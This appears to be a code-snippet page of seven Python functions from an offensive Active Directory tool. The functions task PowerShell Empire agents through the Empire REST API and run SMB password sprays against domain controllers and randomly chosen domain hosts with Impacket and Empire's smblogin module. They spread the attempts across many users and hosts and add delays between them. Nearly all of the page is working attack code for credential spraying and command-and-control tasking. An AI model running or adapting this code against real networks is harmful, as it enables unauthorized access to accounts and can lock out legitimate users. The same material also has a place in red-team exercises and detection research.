Example #1
0
    def execute_module_with_results(self,module_name, agent_name, module_options=None):
        #print ("Executing module " + module_name + " on " + agent_name)
        r = self.execute_module(module_name, agent_name, module_options)
        if r:
            #print ("Result: " + str(r['success']))
            print_info("Msg: " + r['msg'])
            #print ("Msg: " + r['msg'])
            if r['success'] is not False:

                #print ("Waiting for results...")
                print_info("Waiting for results...")

                while True:
                    for result in self.get_agent_results(agent_name)['results']:
                        done = False
                        if len(result) > 0:
                            for entry in result['AgentResults']:
                                if entry['taskID'] == r['taskID']:

                                    # Here we fix a bunch of stuff because Empire does not give standard output for all modules
                                    # This is for get_domain_sid because Empire doesn't have a "completed" string when its done
                                    if module_name == 'powershell/management/get_domain_sid':
                                        if 'S-1-5-21' in entry['results']:
                                            done = True

                                    # Empire returns "Job started: xxxxxx" as results but we need just the completed results
                                    if ' completed' in entry['results']:
                                        done = True

                                    if done == True:
                                        # if debug: print_debug('Result Buffer: {}'.format(entry), agent_name)
                                        return entry['results']
                    sleep(2)
Example #2
0
    def __init__(self,host,port,username,password):

        print_info("Connecting to Empire REST API Server on "+host+":"+str(port)+"....")
        self.host=host
        self.port=port
        self.base_url = 'https://'+host+':'+str(port)
        self.token= {'token': self.login(host,username,password)}
        if self.token['token'] is not None:
            print_status("Successfully connected to Empire server "+host)
            print_info("Starting Http Listener...")
            self.listener = self.get_listener()
            self.stager = self.generate_stager()
Example #3
0
def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    ## Against several random hosts on the domain. Un authentication per host.

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")

    if nusers > len(computers):
        users = users[:len(computers)]

    for idx, user in enumerate(users):
        smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
Example #4
0
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
    ## Against one random host on the domain

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain,computers,dc_ip)

    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " -  " + host[1])
    computername = host[0] if UseKerberos else host[1]

    if UseDomainAct:

        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")

    else:

        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")

    usernames = []

    for user in users:

        usernames.append(user if UseDomainAct else generate_random_users(10)[0])

    usernames = ",".join(usernames)
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")


    module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword,
                      'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'',
                                                              'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}

    results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
    print_status("Obtained results from the Powershell Empire agent")
    process_empire_results(results,host)
Example #5
0
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ):
    ## Against the DC

    print_info("Querying for Domain Controllers...")
    dcs =get_dcs(duser, dpass, domain, dc_ip)

    dcs = get_live_hosts(domain,dcs,dc_ip)

    dc = random.choice(dcs)
    print_status("Randomly picked DC : "+dc[0]+" -  "+dc[1])

    if UseDomainAct:

        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login(domain, users, spraypassword, dc, sleep)


    else:
        users = generate_random_users(nusers)
        print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login("", users, spraypassword, dc, sleep)
Example #6
0
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
    ## Against several random hosts on the domain. One authentication per host.

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        #users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")

    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")

    print_info("Identifying live hosts ...")
    computers=get_live_hosts(domain,computers,dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...")

    if nusers > len(computers):
        users = users[:len(computers)]

    for idx, user in enumerate(users):
        duser = user if UseDomainAct else generate_random_users(1)[0]
        computername = computers[idx][0] if UseKerberos else computers[idx][1]
        module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd,
                          'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'',
                                                                  'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'}

        results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin",
                                                            agentid, module_options)
        print_status("Obtained results from the Powershell Empire agent")
        process_empire_results(results,computers[idx])
        # In thise scenario, adding the sleep here instead of Invoke-SMBLogin
        if sleep > 0 :
            time.sleep(sleep)
Example #7
0
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword,  UseDomainAct=True):
    ## Against one random host on the domain

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")

    computers=get_live_hosts(domain,computers,dc_ip)

    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " -  " + host[1])

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login(domain, users, spraypassword, host, sleep)


    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login("", users, spraypassword, host, sleep)